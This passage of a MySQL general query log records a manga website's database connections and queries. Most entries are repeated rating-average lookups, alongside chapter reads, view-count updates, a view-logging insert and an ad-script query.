as average_rating FROM ratings where manga_id = '113' order by created desc 330644666 Quit 330644667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330644667 Quit 330644668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330644668 Quit 330644669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330644669 Quit 330644670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330644670 Quit 330644671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330644671 Quit 330644672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330644672 Quit 330644673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330644673 Quit 330644674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330644674 Quit 330644675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330644675 Quit 330644676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330644676 Quit 330644677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330644677 Quit 330644678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330644678 Quit 330644679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330644679 Quit 330644680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330644680 Quit 330644681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330644681 Quit 330644682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330644682 Quit 330644683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330644683 Quit 330644684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330644684 Quit 330644685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330644685 Quit 330644686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330644686 Quit 330644687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330644687 Quit 330644688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330644688 Quit 330644689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330644689 Quit 330644690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330644690 Quit 330644691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330644691 Quit 330644692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330644692 Quit 330644693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330644693 Quit 330644694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330644694 Quit 330644695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330644695 Quit 330644696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330644696 Quit 330644697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330644697 Quit 330644698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330644698 Quit 330644699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330644699 Quit 330644700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330644700 Quit 330644701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330644701 Quit 330644702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330644702 Quit 330644703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330644703 Quit 330644704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330644704 Quit 330644705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330644705 Quit 330644706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330644706 Quit 330644707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330644707 Quit 330644708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330644708 Quit 330644709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330644709 Quit 330644710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330644710 Quit 330644711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330644711 Quit 330644712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330644712 Quit 330644713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330644713 Quit 330644714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330644714 Quit 330644715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330644715 Quit 330644716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330644716 Quit 330644717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330644717 Quit 330644718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330644718 Quit 330644719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330644719 Quit 330644720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330644720 Quit 330644721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330644721 Quit 330644722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330644722 Quit 330644723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330644723 Quit 330644724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330644724 Quit 330644725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330644725 Quit 330644726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330644726 Quit 330644727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330644728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644727 Quit 330644728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330644728 Quit 330644729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330644729 Quit 330644730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330644730 Quit 330644731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330644731 Quit 330644732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330644732 Quit 330644733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330644733 Quit 330644734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330644734 Quit 330644735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330644735 Quit 330644736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330644736 Quit 330644737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330644737 Quit 330644738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330644738 Quit 330644739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330644739 Quit 330644740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330644740 Quit 330644741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330644741 Quit 330644742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330644742 Quit 330644743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330644743 Quit 330644744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330644744 Quit 330644745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330644745 Quit 330644746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330644746 Quit 330644747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330644747 Quit 330644748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330644748 Quit 330644749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330644749 Quit 330644750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330644750 Quit 330644751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330644751 Quit 330644752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330644752 Quit 330644753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330644753 Quit 330644754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330644754 Quit 330644755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330644755 Quit 330644756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330644756 Quit 330644757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330644757 Quit 330644758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330644758 Quit 330644759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330644759 Quit 330644760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330644760 Quit 330644761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330644761 Quit 330644762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330644762 Quit 330644763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330644763 Quit 330644765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644764 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330644765 Quit 330644767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644766 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330644764 Quit 330644766 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1950' and m.active = 1 330644767 Quit 330644768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330644768 Quit 330644769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330644769 Quit 330644766 Quit 330644770 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330644770 Query select * FROM chapters where id = '1950' 330644771 Quit 330644772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644770 Quit 330644772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330644772 Quit 330644773 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644773 Query select * FROM chapters where manga_id = '100' order by display_priority ASC, id desc 330644774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330644774 Quit 330644775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330644775 Quit 330644776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330644776 Quit 330644773 Quit 330644777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644778 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330644778 Query Update chapters set view=view+1 where id = '1950' 330644777 Quit 330644779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330644779 Quit 330644780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644778 Quit 330644780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330644780 Quit 330644781 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644781 Query select * FROM chapters where id = '1950' 330644782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330644782 Quit 330644783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644784 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330644784 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1950' and m.active = 1 330644781 Quit 330644783 Quit 330644784 Quit 330644785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330644785 Quit 330644786 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644786 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('100', '1950', '103.112.171.243', 'mangaberri.com', '2026-02-26 03:28:35', '2026-02-26 03:28:35') 330644787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330644787 Quit 330644788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330644788 Quit 330644789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644786 Quit 330644789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330644789 Quit 330644790 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644790 Query select * FROM chapter_images where chapter_id = '1950' 330644791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330644790 Quit 330644791 Quit 330644792 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644792 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '100' and m.active = 1 330644793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330644793 Quit 330644794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330644794 Quit 330644792 Quit 330644795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644796 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330644795 Quit 330644796 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='100' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Shounen%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330644797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330644797 Quit 330644798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330644798 Quit 330644799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330644799 Quit 330644800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330644800 Quit 330644801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330644801 Quit 330644802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330644802 Quit 330644803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330644803 Quit 330644804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330644804 Quit 330644805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330644805 Quit 330644806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330644806 Quit 330644807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330644807 Quit 330644808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330644808 Quit 330644809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330644809 Quit 330644810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330644810 Quit 330644796 Quit 330644811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330644811 Quit 330644812 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330644814 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644812 Quit 330644814 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644813 Quit 330644815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330644814 Quit 330644815 Quit 330644816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330644816 Quit 330644817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644818 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330644817 Quit 330644819 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644818 Quit 330644819 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644820 Connect mangauser@localhost 